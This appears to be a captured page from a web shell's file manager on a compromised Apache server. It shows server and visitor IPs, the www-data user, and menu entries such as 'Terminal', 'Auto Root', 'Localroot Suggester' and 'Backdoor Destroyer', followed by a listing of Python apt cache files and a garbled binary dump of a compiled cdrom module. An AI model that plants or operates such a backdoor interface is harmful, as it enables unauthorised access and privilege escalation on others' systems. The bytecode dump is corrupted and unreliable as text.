Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.217.80
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
python3 /
dist-packages /
apt /
__pycache__ /
Delete
Unzip
Name
Size
Permission
Date
Action
__init__.cpython-312.pyc
660
B
-rw-r--r--
2026-02-08 03:05
auth.cpython-312.pyc
11.17
KB
-rw-r--r--
2026-02-08 03:05
cache.cpython-312.pyc
47.49
KB
-rw-r--r--
2026-02-08 03:05
cdrom.cpython-312.pyc
3.48
KB
-rw-r--r--
2026-02-08 03:05
debfile.cpython-312.pyc
36.55
KB
-rw-r--r--
2026-02-08 03:05
package.cpython-312.pyc
73.75
KB
-rw-r--r--
2026-02-08 03:05
utils.cpython-312.pyc
3.61
KB
-rw-r--r--
2026-02-08 03:05
Save
Rename
� �n�g � �N � d Z ddlZddlZddlmZ G d� dej � Zy)z"Classes related to cdrom handling.� N)� CdromProgressc � � e Zd ZdZ ddedz dedz deddfd�Zddedz defd�Zddedz defd �Z e defd �� Zy) �Cdroma; Support for apt-cdrom like features. This class has several optional parameters for initialisation, which may be used to influence the behaviour of the object: The optional parameter `progress` is a CdromProgress() subclass, which will ask for the correct cdrom, etc. If not specified or None, a CdromProgress() object will be used. The optional parameter `mountpoint` may be used to specify an alternative mountpoint. If the optional parameter `nomount` is True, the cdroms will not be mounted. This is the default behaviour. N�progress� mountpoint�nomount�returnc �> � t j j | � |�t � | _ n|| _ |� t j j d|� |r!t j j dd� y t j j dd� y )NzAcquire::cdrom::mountzAPT::CDROM::NoMount�true�false)�apt_pkgr �__init__r � _progress�config�set)�selfr r r s �+/usr/lib/python3/dist-packages/apt/cdrom.pyr zCdrom.__init__/ st � � � � ���t�$���*�_�D�N�%�D�N��!��N�N���6� �C���N�N���4�f�=��N�N���4�g�>� c �^ � t j j | |xs | j � S )zAdd cdrom to the sources.list.)r r �addr �r r s r r z Cdrom.addC s"